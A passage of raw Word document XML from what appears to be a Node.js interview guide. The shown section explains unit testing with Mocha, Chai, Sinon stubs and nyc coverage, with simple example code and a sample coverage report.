          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Jasmine</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> are used for writing and running unit tests. </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Chai</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> is often used alongside Mocha for assertions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3026C708" w14:textId="77777777" w:rsidR="003D2016" w:rsidRPr="00DA2F32" w:rsidRDefault="003D2016" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>2. Setting Up a Testing Environment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AAE4ADB" w14:textId="77777777" w:rsidR="003D2016" w:rsidRPr="00DA2F32" w:rsidRDefault="003D2016" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Mocha and Chai Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B7AA24D" w14:textId="77777777" w:rsidR="003D2016" w:rsidRPr="00DA2F32" w:rsidRDefault="003D2016" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Initialize your project:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1949F70A"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npm init -y</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4596EAD0" w14:textId="77777777" w:rsidR="003D2016" w:rsidRPr="00DA2F32" w:rsidRDefault="003D2016" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Install Mocha and Chai:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C1BF93A"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npm install --save-dev mocha chai</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7834F351" w14:textId="77777777" w:rsidR="003D2016" w:rsidRPr="00DA2F32" w:rsidRDefault="003D2016" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Update package.json to include a test script:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="462060D4"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"scripts": {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="632F78D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"test": "mocha"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F3C7394"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D2ABE92" w14:textId="77777777" w:rsidR="003D2016" w:rsidRPr="00DA2F32" w:rsidRDefault="003D2016" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>3. Writing Your First Test</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BDDBDA8"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Suppose you have a simple function in math.js:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67D34F6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math.js</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="309AE044"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add(a, b) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="409A581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a + b;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C3307FB"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CC611E8"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5A9D682"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module.exports = { add };</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F972247"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Creating a test file:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B8C7C18" w14:textId="2D05F9D0" w:rsidR="003D2016" w:rsidRPr="00DA2F32" w:rsidRDefault="003D2016" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Create a test directory and a test file test/math.test.js.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17817E7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mkdir test</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DDE25C0"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touch test/math.test.js</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E5B1443"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Writing the test:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44FAE0A3"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test/math.test.js</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="678893C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expect } = require('chai');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D9AD6FE"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add } = require('../math');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3836BEF7"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2748EAC4"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describe('Math Module', () =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33631D4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it('should return the sum of two numbers', () =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C67BA02"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result = add(2, 3);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3257D0EB"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expect(result).to.equal(5);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DF69A50"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88AF230"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7579F07A"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it('should return a negative sum when both inputs are negative', () =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="620B7EBD"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result = add(-2, -3);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E0A13C4"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expect(result).to.equal(-5);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13A530C1"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34C1AFA"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9B3D1DE"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Running the tests:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0192AA11"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npm test</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="729301A6"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The output should look like:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EB667F3"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Math Module</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56BE8C33"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 xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>✓</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> should return the sum of two numbers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67155FD6"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 xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>✓</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> should return a negative sum when both inputs are negative</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A0A7061" w14:textId="77777777" w:rsidR="003D2016" w:rsidRPr="00DA2F32" w:rsidRDefault="003D2016" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>4. Testing Asynchronous Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D8618B3"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Node.js frequently involves asynchronous operations. Testing such code can be done using callbacks, Promises, or async/await.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C6E4E3D"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Example with async/await:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A1606B4"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async.js</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A0BE882"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fetchData() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05E370C9"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new Promise((resolve) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="016A9349"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setTimeout(() =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70A0F6D6"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resolve('data');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A2A6D19"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100);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78A8391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8A3EFFD"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43AB0D2"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A9E686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module.exports = { fetchData };</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A189BB9"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Test with Mocha and Chai:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="266FD858"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test/async.test.js</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BCB7944"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expect } = require('chai');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37F8029D"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fetchData } = require('../async');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="408923DE"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831C587"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describe('Async Module', () =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5873A9A1"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it('should return data after 100ms', async () =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="683F5A4E"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data = await fetchData();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="617853DA"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expect(data).to.equal('data');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6035B327"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726BAA9"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lastRenderedPageBreak/>
        <w:t>});</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73D3908D" w14:textId="77777777" w:rsidR="003D2016" w:rsidRPr="00DA2F32" w:rsidRDefault="003D2016" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>5. Mocking and Stubbing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="165D630B"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 xml:space="preserve">In unit tests, you might need to mock dependencies to isolate the unit under test. Libraries like </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Sinon</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> can help with this.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17AD4D2E"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Example using Sinon:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="220B8D1E"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npm install --save-dev sinon</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C6352D6" w14:textId="77777777" w:rsidR="00164525" w:rsidRPr="00DA2F32" w:rsidRDefault="0016452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3BA7D77" w14:textId="594D7A8D"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userService.js</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="046C3D3D"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db = require('./db');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4775FC11"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453E6C7"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getUser(id) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71C92885"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db.findUserById(id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D247A6A"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B791757"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F812E7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module.exports = { getUser };</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59E128A2"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Test with a mocked database:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C64F62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test/userService.test.js</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3844D179"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sinon = require('sinon');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4324E07B"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expect } = require('chai');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78C49A22"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db = require('../db');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="295A072F"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getUser } = require('../userService');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DD26139"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0AE8CF08"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describe('UserService', () =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="205B1B2F"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it('should return user data based on ID', () =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="622E932B"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stub = sinon.stub(db, 'findUserById').returns({ id: 1, name: 'John Doe' });</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FD0C232"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user = getUser(1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76B6CF61"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expect(user).to.eql({ id: 1, name: 'John Doe' });</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E3EA68F"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stub.restore();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2488B290"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B370665"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8FD207D" w14:textId="77777777" w:rsidR="003D2016" w:rsidRPr="00DA2F32" w:rsidRDefault="003D2016" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>6. Code Coverage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D44669"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 xml:space="preserve">Code coverage tools help measure how much of your code is being tested. </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Istanbul</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> (included in </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>nyc</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>) is a popular tool for this.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FF00449"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npm install --save-dev nyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55E12F72"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Add to package.json:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21CCFB0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"scripts": {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FC7D160"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"test": "nyc mocha"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FB83DCC"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A27807F"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Run the tests with coverage:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="693874FD" w14:textId="77777777" w:rsidR="003D2016" w:rsidRPr="00DA2F32" w:rsidRDefault="003D201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npm test</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35ED025A"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b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Coverage Report:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EEEFA56"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01066A72"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File              |  % Stmts | % Branch |  % Funcs |  % Lines | Uncovered Line #s |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E2E498A"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00C820D5"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All files         |    90.91 |      100 |       75 |    90.91 |                   |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18A04766"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async.js          |      100 |      100 |      100 |      100 |                   |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57DFDA7D"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math.js           |      100 |      100 |      100 |      100 |                   |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41CDC8DC"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userService.js    |       80 |      100 |       50 |       80 |                 4 |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E9F812F" w14:textId="77777777" w:rsidR="003D2016" w:rsidRPr="00DA2F32" w:rsidRDefault="003D2016" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>------------------|----------|----------|----------|----------|-------------------|</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="182B92B6" w14:textId="77777777" w:rsidR="003D2016" w:rsidRPr="00DA2F32" w:rsidRDefault="003D2016" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>7. Best Practices for Unit Testing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA81127" w14:textId="77777777" w:rsidR="003D2016" w:rsidRPr="00DA2F32" w:rsidRDefault="003D2016" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Isolate Tests:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Ensure that tests run independently and do not rely on external states.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CA6F87B" w14:textId="77777777" w:rsidR="003D2016" w:rsidRPr="00DA2F32" w:rsidRDefault="003D2016" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Write Descriptive Tests:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Use meaningful names for your test cases to describe what is being tested.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C97756E" w14:textId="77777777" w:rsidR="003D2016" w:rsidRPr="00DA2F32" w:rsidRDefault="003D2016" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Test Edge Cases:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Cover a variety of inputs, including edge cases, to make your tests more robust.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4980C26B" w14:textId="77777777" w:rsidR="003D2016" w:rsidRPr="00DA2F32" w:rsidRDefault="003D2016" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Use Mocking:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Mock dependencies to test units in isolation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F06E090" w14:textId="77777777" w:rsidR="003D2016" w:rsidRPr="00DA2F32" w:rsidRDefault="003D2016" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F50D3CD"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31" w:name="_Toc178383214"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Q30. Explain the concept of callbacks in Node.js.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="31"/>
    </w:p>
    <w:p w14:paraId="0ADA5AA9"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32" w:name="_Toc178383215"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Q31. How do you implement authentication and authorization in a Node.js application?</w:t>
      </w:r>
